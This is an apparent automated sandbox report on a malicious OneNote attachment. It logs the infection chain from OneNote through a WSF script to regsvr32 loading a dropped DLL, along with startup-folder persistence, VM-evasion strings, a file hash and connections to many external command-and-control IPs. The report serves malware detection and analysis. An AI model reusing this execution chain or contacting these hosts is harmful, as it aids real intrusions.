Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC7C08	13_2_00CC7C08
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC1000	13_2_00CC1000
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDA000	13_2_00CDA000
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE181C	13_2_00CE181C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC7410	13_2_00CC7410
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCB83C	13_2_00CCB83C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD1030	13_2_00CD1030
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDEC30	13_2_00CDEC30
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD15C8	13_2_00CD15C8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDD5F0	13_2_00CDD5F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDBDA0	13_2_00CDBDA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC95BC	13_2_00CC95BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE4D64	13_2_00CE4D64
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD610C	13_2_00CD610C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE8500	13_2_00CE8500
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE2100	13_2_00CE2100
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD7518	13_2_00CD7518
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE9910	13_2_00CE9910
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDAD28	13_2_00CDAD28
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD1924	13_2_00CD1924
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD4D20	13_2_00CD4D20
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC6138	13_2_00CC6138
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDB130	13_2_00CDB130
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCD6CC	13_2_00CCD6CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDEAC0	13_2_00CDEAC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD96D4	13_2_00CD96D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE36FC	13_2_00CE36FC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC92F0	13_2_00CC92F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC8A8C	13_2_00CC8A8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE4E8C	13_2_00CE4E8C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE2E84	13_2_00CE2E84
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCBE90	13_2_00CCBE90
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD4A90	13_2_00CD4A90
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC3ABC	13_2_00CC3ABC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDA6BC	13_2_00CDA6BC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCAAB8	13_2_00CCAAB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC4EB8	13_2_00CC4EB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE2AB0	13_2_00CE2AB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE6E48	13_2_00CE6E48
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDA244	13_2_00CDA244
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCF65C	13_2_00CCF65C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCB258	13_2_00CCB258
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCA660	13_2_00CCA660
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC3274	13_2_00CC3274
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD0A70	13_2_00CD0A70
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC3E0C	13_2_00CC3E0C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD020C	13_2_00CD020C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD8E08	13_2_00CD8E08
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD5A00	13_2_00CD5A00
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE8A00	13_2_00CE8A00
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC461C	13_2_00CC461C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC4214	13_2_00CC4214
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCBA2C	13_2_00CCBA2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD8A2C	13_2_00CD8A2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD0E2C	13_2_00CD0E2C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD662C	13_2_00CD662C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC263C	13_2_00CC263C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD97CC	13_2_00CD97CC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC2FD4	13_2_00CC2FD4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC33D4	13_2_00CC33D4
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE27EC	13_2_00CE27EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDFFFC	13_2_00CDFFFC
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCA7F0	13_2_00CCA7F0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD5384	13_2_00CD5384
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC1B94	13_2_00CC1B94
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE47A8	13_2_00CE47A8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCDBA0	13_2_00CCDBA0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCFFB8	13_2_00CCFFB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD8BB8	13_2_00CD8BB8
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC8FB0	13_2_00CC8FB0
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC975C	13_2_00CC975C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC4758	13_2_00CC4758
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDE750	13_2_00CDE750
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE8B68	13_2_00CE8B68
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCF77C	13_2_00CCF77C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC8378	13_2_00CC8378
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDD770	13_2_00CDD770
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDCF70	13_2_00CDCF70
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE5B1C	13_2_00CE5B1C
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD4F18	13_2_00CD4F18
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCEF14	13_2_00CCEF14
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CD3B14	13_2_00CD3B14
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDE310	13_2_00CDE310
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE8310	13_2_00CE8310
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CCD33C	13_2_00CCD33C

Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,	12_2_0000000180010C10
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180010AC0 ExitProcess,RtlQueueApcWow64Thread,NtTestAlert,	12_2_0000000180010AC0
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180010DB0 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,	12_2_0000000180010DB0

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll 2F39C2879989DDD7F9ECF52B6232598E5595F8BF367846FF188C9DFBF1251253

Source: iMedPub_LTD_4.one

ReversingLabs: Detection: 30%

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\iMedPub_LTD_4.one
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RPJQOdVdSbhDZ\IMSnbfr.dll"
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process created: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE /tsr	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe "C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll"	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\RPJQOdVdSbhDZ\IMSnbfr.dll"	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32

Jump to behavior

Source: Send to OneNote.lnk.0.dr

LNK file: ..\..\..\..\..\..\..\..\..\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File created: C:\Users\user\Documents\{BD346789-81A0-48A0-A327-1DFC3B5DC77D}

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File created: C:\Users\user~1\AppData\Local\Temp\{840C51EB-1960-422B-B076-56DDE4DD8741} - OProcSessId.dat

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winONE@11/318@1/49

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File read: C:\Program Files (x86)\desktop.ini

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_01288BC8 Process32FirstW,CreateToolhelp32Snapshot,FindCloseChangeNotification,

12_2_01288BC8

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE

Mutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared

Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180005C69 push rdi; ret	12_2_0000000180005C72
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_00000001800056DD push rdi; ret	12_2_00000001800056E4
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01297D25 push 4D8BFFFFh; retf	12_2_01297D2A
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01297D3C push ebp; retf	12_2_01297D3D
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01297D4E push ebp; iretd	12_2_01297D4F
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01289D51 push ebp; retf	12_2_01289D5A
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01298157 push ebp; retf	12_2_01298158
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01297987 push ebp; iretd	12_2_0129798F
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128A1D2 push ebp; iretd	12_2_0128A1D3
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01286C9F pushad ; ret	12_2_01286CAA
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128A0FC push ebp; iretd	12_2_0128A0FD
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01286CDE push esi; iretd	12_2_01286CDF
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_012980D7 push ebp; retf	12_2_012980D8
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0129C731 push esi; iretd	12_2_0129C732
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0128A26E push ebp; ret	12_2_0128A26F
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01297EAF push 458BCC5Ah; retf	12_2_01297EBC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_01289E8B push eax; retf	12_2_01289E8E
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC6CDE push esi; iretd	13_2_00CC6CDF
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CC6C9F pushad ; ret	13_2_00CC6CAA
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CE6D34 push edi; ret	13_2_00CE6D36
Source: C:\Windows\System32\regsvr32.exe	Code function: 13_2_00CDC731 push esi; iretd	13_2_00CDC732

Source: radB1175.tmp.dll.10.dr

Static PE information: section name: _RDATA

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll

Source: C:\Windows\System32\regsvr32.exe	File created: C:\Windows\System32\RPJQOdVdSbhDZ\IMSnbfr.dll (copy)			Jump to dropped file
Source: C:\Windows\SysWOW64\wscript.exe	File created: C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll			Jump to dropped file

Source: C:\Windows\System32\regsvr32.exe

File created: C:\Windows\System32\RPJQOdVdSbhDZ\IMSnbfr.dll (copy)

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\System32\regsvr32.exe

File opened: C:\Windows\system32\RPJQOdVdSbhDZ\IMSnbfr.dll:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe TID: 5184	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 5196	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe TID: 4316	Thread sleep time: -660000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

API coverage: 9.3 %

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_0000000180008D28 FindFirstFileExW,

12_2_0000000180008D28

Source: C:\Windows\System32\regsvr32.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: wscript.exe, 0000000A.00000003.341314340.00000000058D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Ky
Source: wscript.exe, 0000000A.00000003.345684098.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.348197203.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341314340.00000000058D3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462973550.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.816817308.0000000000E22000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000002.816434632.0000000000DCB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462370814.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462587375.0000000000E23000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000D.00000003.462370814.0000000000DCB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 0000000A.00000003.341314340.00000000058D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Ky
Source: wscript.exe, 0000000A.00000003.341489972.00000000058AD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.347992328.00000000058AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 0000000A.00000003.345684098.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000002.348197203.00000000058D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000A.00000003.341314340.00000000058D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWc

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

12_2_0000000180001C48

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_000000018000A878 GetProcessHeap,

12_2_000000018000A878

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_0000000180010C10 LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,

12_2_0000000180010C10

Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_0000000180001C48 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_0000000180001C48
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_00000001800082EC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	12_2_00000001800082EC
Source: C:\Windows\System32\regsvr32.exe	Code function: 12_2_00000001800017DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	12_2_00000001800017DC

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 159.65.88.10 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 164.90.222.65 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 213.239.212.5 443	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: penshorn.org
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 186.194.240.217 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 104.168.155.143 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 159.89.202.34 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 160.16.142.56 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 91.121.146.47 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 91.207.28.33 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 103.43.75.120 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 72.15.201.15 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 163.44.196.120 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 206.189.28.199 8080	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 203.26.41.131 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 107.170.39.149 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 187.63.160.88 80	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 66.228.32.31 7080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 82.223.21.224 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 149.56.131.28 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 169.57.156.166 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 182.162.143.56 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 1.234.2.232 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 167.172.199.165 8080	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\radB1175.tmp.dll

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_00000001800070A0 cpuid

12_2_00000001800070A0

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_0000000180001D98 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

12_2_0000000180001D98

Stealing of Sensitive Information

Yara detected Malicious OneNote

Source: Yara match

